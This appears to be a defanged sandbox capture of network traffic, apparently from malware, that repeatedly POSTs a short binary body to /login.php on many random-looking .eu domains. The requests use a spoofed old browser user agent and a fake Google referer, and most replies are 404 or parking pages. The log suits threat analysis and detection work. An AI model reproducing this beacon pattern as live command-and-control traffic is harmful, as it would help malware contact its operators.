User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lykil.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx/1.0.14

Date: Mon, 10 Nov 2014 20:01:18 GMT

Content-Type: text/html; charset=UTF-8

Connection: close

Vary: X-Forwarded-For

X-Powered-By: PHP/5.3.10

X-Pingback: hXXp://lykil.se/xmlrpc.php

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Content-Length: 7146

Accept-Ranges: bytes

X-Varnish: 2462812272

Age: 0

Via: 1.1 varnish

X-Loopia-Cache: MISS
<!DOCTYPE html>.<html lang="sv-SE" prefix="og: hXXp://ogp.me/
ns# fb: hXXp://ogp.me/ns/fb#">.<head>.<meta charset="UTF-8
" />.<title>404 Not Found | lykil</title>.<link rel=
"profile" href="hXXp://gmpg.org/xfn/11" />.<link rel="stylesheet
" type="text/css" media="all" href="hXXp://lykil.se/wp-content/themes/
page7/style.css" />.<link rel="pingback" href="hXXp://lykil.se/x
mlrpc.php" />..<!-- SEO Ultimate (hXXp://VVV.seodesignsolutions.
com/wordpress-seo/) -->.<!-- /SEO Ultimate -->..<link rel=
'stylesheet' id='frm-forms-css'  href='hXXp://lykil.se/wp-content/plug
ins/formidable/css/frm_display.css?ver=1.07.04' type='text/css' media=
'all' />.<script type='text/javascript' src='hXXp://lykil.se/wp-
includes/js/jquery/jquery.js?ver=1.11.1'></script>.<script
 type='text/javascript' src='hXXp://lykil.se/wp-includes/js/jquery/jqu
ery-migrate.min.js?ver=1.2.1'></script>.<link rel="EditURI
" type="application/rsd xml" title="RSD" href="hXXp://lykil.se/xmlrpc.
php?rsd" />.<link rel="wlwmanifest" type="application/wlwmanifes
t xml" href="hXXp://lykil.se/wp-includes/wlwmanifest.xml" /> .<m
eta name="generator" content="WordPress 4.0" />.<script src="htt
p://lykil.se/wp-content/themes/page7/js/superfish-combined.js"><
/script>.<script src="hXXp://lykil.se/wp-content/themes/page7/js
/jquery.cycle.all.min.js"></script>.<script src="hXXp://ly
kil.se/wp-content/themes/page7/js/script.js"></script>.&l
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gacek.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:31 GMT

Content-Type: text/html

Connection: close

Accept-Ranges: bytes

Vary: Accept-Encoding

Server: Apache/2
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">.<HTML>.
<HEAD>.<meta http-equiv="Content-Type" content="text/html; ch
arset=iso-8859-2">.<meta http-equiv="Content-Language" content="
pl">..<style type="text/css">.. body {font-family: arial; bac
kground: #ffffff; font-size: 8px color: white;}.. td { font-family: ve
rdana; font-size: 11px;color: black; }.. p { font-family: verdana; fon
t-size: 18px; color: black; text-align: center;}... a:hover {text-deco
ration: none; color: white}.</style>.<TITLE>.(none).</T
ITLE>.</HEAD>.<BODY style="bgcolor: #FFFFFF">......<
div style="text-align:center;">.<br>.<table width="100%" b
order="0" cellpadding="0" cellspacing="0" style="align: center">.&l
t;tr><td style="width: 100%" align="center">..<table width
="574" style="background-image:url(/errordocs/pasek.gif); height: 21px
;" border="0" cellpadding="0" cellspacing="0" >...<tr>....<
;td style="text-align: left">....<div style="margin-left:45px"&g
t;<b>Error</b></div>....</td>...</tr>...
</table>..<table width="574" border="0" cellpadding="1" cells
pacing="1" style="background-color: #9c9c9c;text-align:center;">...
<tr>....<td style="background-color: #ffffff">.....<br&
gt;.....<table style="background-color: #ffffff">......<tr>
;.......<td align="center" valign="top"><IMG SRC="/errordocs/
error.gif"  ALT="eroor"></td>.......<td colspan="2" al
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ganed.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 207

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.</body></html
>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyman.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:00:57 GMT

Server: Apache/1.3.36 (Unix) mod_ssl/2.8.27 OpenSSL/0.9.7a

Connection: close

Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..
<html>..<head>..<title>The domain name is registered
</title>..<meta http-equiv="Content-Type" content="text/html;
 charset=windows-1250">..<meta name="description" content="FORPS
I je Evropsk. housingov. spole.nost. Nab.z. slu.by webhostingu, server
hostingu, registrace dom.nov.ch jmen a www str.nky na serverech Window
s/Linux.">..<meta name="keywords" content="forpsi,webhosting,dom
.na,dom.ny,hosting,server,serverhosting,housing,serverhousing,adsl,wif
i,wi-fi,domain,domains">..<style type="text/css">..<!--..h
tml, body {...margin: 0px;...padding: 0px;...height: 100%;...backgroun
d-color: #32549c;..}..#container {...height: 100%;...width: 100%;...te
xt-align: center;..}..#box {...width: 520px;...position: relative;...m
argin: 0 auto;...top: 160px;...border: 4px solid #cccccc;...background
-color: #FFFFFF;...background-image: url(img/logo_forpsi.gif);...backg
round-repeat: no-repeat;...background-position: left top;...padding: 2
0px;...font-family : Verdana, Arial, Helvetica, sans-serif;...font-siz
e: 14px;...color: #38506b;..}..#box2 {...width: 520px;...position: rel
ative;...margin: 0 auto;...top: 160px;...border: 4px solid #cccccc;...
background-color: #FFFFFF;...padding: 20px;...font-family : Verdana, A
rial, Helvetica, sans-serif;...font-size: 14px;...color: #38506b;..}..
.#flag {...position: absolute;...left: 95px;...top: 60px;..}...txt {..
.font-family: Verdana, Arial, Helvetica, sans-serif;...font-size: 
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocer.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache

Location: hXXp://VVV.vocer.org/login.php

Vary: Accept-Encoding

Content-Length: 238

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.vocer.org/login.php">here&
lt;/a>.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vonak.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 200 OK

Date: Mon, 10 Nov 2014 20:01:19 GMT

Server: Apache/2.2.16 (Debian)

X-Powered-By: PHP/5.3.22-1~dotdeb.0

Vary: Accept-Encoding

Connection: close

Content-Type: text/html
.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
tp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html x
mlns="hXXp://VVV.w3.org/1999/xhtml" lang="nl" xml:lang="nl">...<
head>..        .<title></title>.        ...        <
meta http-equiv="content-type" content="text/html; charset=utf-8" />
;..        <meta name="keywords" content="" />..        <meta
 name="description" content="" />..        .<!--..        <me
ta property="og:title" content="" /> ..        <meta property="o
g:site_name" content="" />..        <meta property="og:descripti
on" content="" />       ..        <meta property="og:url" conten
t="hXXp://vonak.eu" />..        -->        ...        <link r
el="shortcut icon" href="" type="image/x-icon" />..       ..<sty
le type="text/css">..                html, body {..                
        margin: 0px;.                        padding: 0px;.           
             bottom: 0px;.                        height: 100%;.      
                  width: 100%;.                        border: 0px;.  
                      overflow: hidden;..                }..          
      iframe {..                        margin: 0px;.                 
       padding: 0px;.                        bottom: 0px;.            
            height: 100%;.                        width: 100%;.       
                 border: none;..                }...        </style
>...</head>...<body>..        .<iframe src="http
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ganed.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 207

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.</body></html
>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocer.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:22 GMT

Server: Apache

Location: hXXp://VVV.vocer.org/login.php

Vary: Accept-Encoding

Content-Length: 238

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.vocer.org/login.php">here&
lt;/a>.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: purel.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:33 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 207

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.</body></html
>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: purex.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:24 GMT

Location: hXXp://corporate.evonik.com/en/

Content-Length: 239

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://corporate.evonik.com/en/">here
</a>.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qexer.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:28 GMT

Server: Apache / DataZone

Content-Length: 276

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache / DataZone Server at qexer.eu Port 80</address>.</
body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: purac.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 200 OK

Date: Mon, 10 Nov 2014 20:01:15 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 1013

Connection: close

Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN">.<
html>.<head>.<title>The largest producer of natural lac
tic acid, derivatives, gluconates, lactides and polylactides</title
>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UT
F-8">.<meta name="robots" content="index,follow">.<meta na
me="description" content="">.<meta name="keywords" content="natu
ral lactic acid, derivatives, gluconates, lactides, polylactides">.
<style type="text/css">.frameset { border:0px; margin:0px; paddi
ng:0px; } .frame { border:0px; margin:0px; padding:0px; }.</style&g
t;.</head>.<frameset rows="100%">.<frame src="hXXp://ww
w.purac.com/" name="bescherm">.<noframes>.<body bgcolor="F
FFFFF" link="000099" alink="000099" vlink="000099">.<div align="
center">.<br><br>.<font face="Verdana, Arial" size="
2">.hXXp://VVV.purac.com/<br><br>.Klik <a href="http
://VVV.purac.com/">hier</A> wanneer u niet binnen 5 seconden 
automatisch wordt doorverbonden met onze website..</font>.</d
iv>.</body>.</noframes>.</frameset>  .</html&g
t;...

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.dr.dk

Pragma: no-cache

e looking for might have been removed, had its name changed, or is tem
porarily unavailable.</h3>.. </fieldset></div>..<
/div>..</body>..</html>..HTTP/1.1 404 Not Found..Conten
t-Type: text/html..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..X
-Template: legacy..X-Cacheable: YES:default_ttl=119.000..Cache-Control
: ..Date: Mon, 10 Nov 2014 20:01:20 GMT..X-Varnish: 2322933706..Age: 0
..Via: 1.1 varnish..Connection: close..X-Via: varnishol04.dr.dk (172.1
8.120.194:80)..X-Cache: MISS..X-WebEdge: 2519....<!DOCTYPE html PUB
LIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://VVV.w3.org/TR/xhtml1/DT
D/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml
">..<head>..<meta http-equiv="Content-Type" content="text/
html; charset=iso-8859-1"/>..<title>404 - File or directory n
ot found.</title>..<style type="text/css">..<!--..body{
margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-se
rif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{fon
t-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:
#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#he
ader{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebu
chet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}.
.#content{margin:0 0 0 2%;position:relative;}...content-container{back
ground:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}.
.-->..</style>..</head>..<body>..<div id="
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galor.eu

Content-Length: 9

Pragma: no-cache

Cookie: 3c861760030e5c7267e7fc479cac0c97=90ed9e5183ab72b8b4139ea09817675b

....~7.~'

HTTP/1.0 404 Artyku..u nie znaleziono

Cache-Control: no-cache

Connection: close

Content-Type: text/html

Date: Mon, 10 Nov 2014 20:01:02 GMT

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Pragma: no-cache

Server: IdeaWebServer/v0.80
<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xm
l:lang="pl-pl" lang="pl-pl" dir="ltr">.<head>..<meta http-
equiv="content-type" content="text/html; charset=utf-8" />..<tit
le>B....d: 404 Artyku..u nie znaleziono</title>..<meta nam
e="viewport" content="width=device-width, initial-scale=1.0">....&l
t;link href='//fonts.googleapis.com/css?family=Open Sans' rel='stylesh
eet' type='text/css' />...<style type="text/css">....h1,h2,h3
,h4,h5,h6,.site-title{.....font-family: 'Open Sans', sans-serif;....}.
..</style>...<link rel="stylesheet" href="/templates/protosta
r/css/template.css" type="text/css" />.....<link href="/template
s/protostar/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft
.icon" />...<style type="text/css">...body.site...{....border
-top: 3px solid #0088cc;....background-color: #ffffff..}...a...{....co
lor: #0088cc;...}....navbar-inner, .nav-list > .active > a, .nav
-list > .active > a:hover, .dropdown-menu li > a:hover, .drop
down-menu .active > a, .dropdown-menu .active > a:hover, .nav-pi
lls > .active > a, .nav-pills > .active > a:hover...{....b
ackground: #0088cc;...}....navbar-inner...{....-moz-box-shadow: 0 1px 
3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px
 10px rgba(0, 0, 0, .2);....-webkit-box-shadow: 0 1px 3px rgba(0, 0, 0
, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0,
 0, .2);....box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galor.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.0 404 Artyku..u nie znaleziono

Cache-Control: no-cache

Connection: close

Content-Type: text/html

Date: Mon, 10 Nov 2014 20:01:00 GMT

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Pragma: no-cache

Server: IdeaWebServer/v0.80

Set-Cookie: 3c861760030e5c7267e7fc479cac0c97=90ed9e5183ab72b8b4139ea09817675b; path=/; HttpOnly
<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xm
l:lang="pl-pl" lang="pl-pl" dir="ltr">.<head>..<meta http-
equiv="content-type" content="text/html; charset=utf-8" />..<tit
le>B....d: 404 Artyku..u nie znaleziono</title>..<meta nam
e="viewport" content="width=device-width, initial-scale=1.0">....&l
t;link href='//fonts.googleapis.com/css?family=Open Sans' rel='stylesh
eet' type='text/css' />...<style type="text/css">....h1,h2,h3
,h4,h5,h6,.site-title{.....font-family: 'Open Sans', sans-serif;....}.
..</style>...<link rel="stylesheet" href="/templates/protosta
r/css/template.css" type="text/css" />.....<link href="/template
s/protostar/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft
.icon" />...<style type="text/css">...body.site...{....border
-top: 3px solid #0088cc;....background-color: #ffffff..}...a...{....co
lor: #0088cc;...}....navbar-inner, .nav-list > .active > a, .nav
-list > .active > a:hover, .dropdown-menu li > a:hover, .drop
down-menu .active > a, .dropdown-menu .active > a:hover, .nav-pi
lls > .active > a, .nav-pills > .active > a:hover...{....b
ackground: #0088cc;...}....navbar-inner...{....-moz-box-shadow: 0 1px 
3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px
 10px rgba(0, 0, 0, .2);....-webkit-box-shadow: 0 1px 3px rgba(0, 0, 0
, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0,
 0, .2);....box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocab.eu

Content-Length: 9

Pragma: no-cache

Cookie: PHPSESSID=envpqbkkkiv4cm5eun0u8hgar1

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:02:36 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.4-14 deb7u8

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache
<div id="saleslander">.    <div class="inner clearfix">.. 
                   <span class="icon"></span>.        .   
                 <h1>vocab.eu<span> is for sale!</span&
gt;</h1>.            <h3>Buying this domain means full con
trol and ownership.</h3>.                <div class="domain_a
ctions">.            <div class="box_payments">.             
                       <p>Price in Words:<br/><b>nin
e hundred and ninety-nine</b></p>.                        
        <p>Domain Punycode:<br/><b class="punycode">
vocab.eu</b></p>.                <p>Payment options:
</p><p class="paymentimg">.                    <img sty
le="border:0;" src="hXXp://vocab.eu/images/payment/visa.png" alt="Buy 
and register a domain with VISA" title="Buy and register a domain with
 VISA" />.                    <img style="height:28px;" src="htt
p://vocab.eu/images/payment/visa_verified.png" alt="Buy and register a
 domain with VISA" title="Buy and register a domain with VISA" />. 
                   <img style="border:0;" src="hXXp://vocab.eu/imag
es/payment/mastercard.png" alt="Buy and register a domain with Masterc
ard" title="Buy and register a domain with Mastercard" />.         
           <img style="height:28px;" src="hXXp://vocab.eu/images/pa
yment/mastercard_securecode.png" alt="Buy and register a domain with M
astercard" title="Buy and register a domain with Mastercard" />
<<< skipped >>>

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.gater.eu

Pragma: no-cache

HTTP/1.1 404 OK

Content-Length: 1635

Content-Type: text/html

Server: Microsoft-IIS/6.0

X-Powered-By: PHP/5.2.0

X-Powered-By: ASP.NET

Date: Mon, 10 Nov 2014 20:01:30 GMT

Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>The p
age cannot be found</TITLE>..<META HTTP-EQUIV="Content-Type" 
Content="text/html; charset=Windows-1252">..<STYLE type="text/cs
s">..  BODY { font: 8pt/12pt verdana }..  H1 { font: 13pt/15pt verd
ana }..  H2 { font: 8pt/12pt verdana }..  A:link { color: red }..  A:v
isited { color: maroon }..</STYLE>..</HEAD><BODY><
;TABLE width=500 border=0 cellspacing=10><TR><TD>..<
h1>The page cannot be found</h1>..The page you are looking fo
r might have been removed, had its name changed, or is temporarily una
vailable...<hr>..<p>Please try the following:</p>..&
lt;ul>..<li>Make sure that the Web site address displayed in 
the address bar of your browser is spelled and formatted correctly.<
;/li>..<li>If you reached this page by clicking a link, conta
ct.. the Web site administrator to alert them that the link is incorre
ctly formatted...</li>..<li>Click the <a href="javascri
pt:history.back(1)">Back</a> button to try another link.</
li>..</ul>..<h2>HTTP Error 404 - File or directory not 
found.<br>Internet Information Services (IIS)</h2>..<hr
>..<p>Technical Information (for support personnel)</p>
..<ul>..<li>Go to <a href="hXXp://go.microsoft.com/fwli
nk/?linkid=8180">Microsoft Product Support Services</a> a
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: volez.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache/2.2.16 (Debian)

Vary: Accept-Encoding

Content-Length: 281

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache/2.2.16 (Debian) Server at volez.eu Port 80</address>.
</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gadak.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:33 GMT

Server: Apache

Content-Length: 326

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<p>Additionally,
 a 404 Not Found.error was encountered while trying to use an ErrorDoc
ument to handle the request.</p>.</body></html>...

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.gater.eu

Pragma: no-cache

HTTP/1.1 404 OK

Content-Length: 1635

Content-Type: text/html

Server: Microsoft-IIS/6.0

X-Powered-By: PHP/5.2.0

X-Powered-By: ASP.NET

Date: Mon, 10 Nov 2014 20:01:31 GMT

Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>The p
age cannot be found</TITLE>..<META HTTP-EQUIV="Content-Type" 
Content="text/html; charset=Windows-1252">..<STYLE type="text/cs
s">..  BODY { font: 8pt/12pt verdana }..  H1 { font: 13pt/15pt verd
ana }..  H2 { font: 8pt/12pt verdana }..  A:link { color: red }..  A:v
isited { color: maroon }..</STYLE>..</HEAD><BODY><
;TABLE width=500 border=0 cellspacing=10><TR><TD>..<
h1>The page cannot be found</h1>..The page you are looking fo
r might have been removed, had its name changed, or is temporarily una
vailable...<hr>..<p>Please try the following:</p>..&
lt;ul>..<li>Make sure that the Web site address displayed in 
the address bar of your browser is spelled and formatted correctly.<
;/li>..<li>If you reached this page by clicking a link, conta
ct.. the Web site administrator to alert them that the link is incorre
ctly formatted...</li>..<li>Click the <a href="javascri
pt:history.back(1)">Back</a> button to try another link.</
li>..</ul>..<h2>HTTP Error 404 - File or directory not 
found.<br>Internet Information Services (IIS)</h2>..<hr
>..<p>Technical Information (for support personnel)</p>
..<ul>..<li>Go to <a href="hXXp://go.microsoft.com/fwli
nk/?linkid=8180">Microsoft Product Support Services</a> a
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

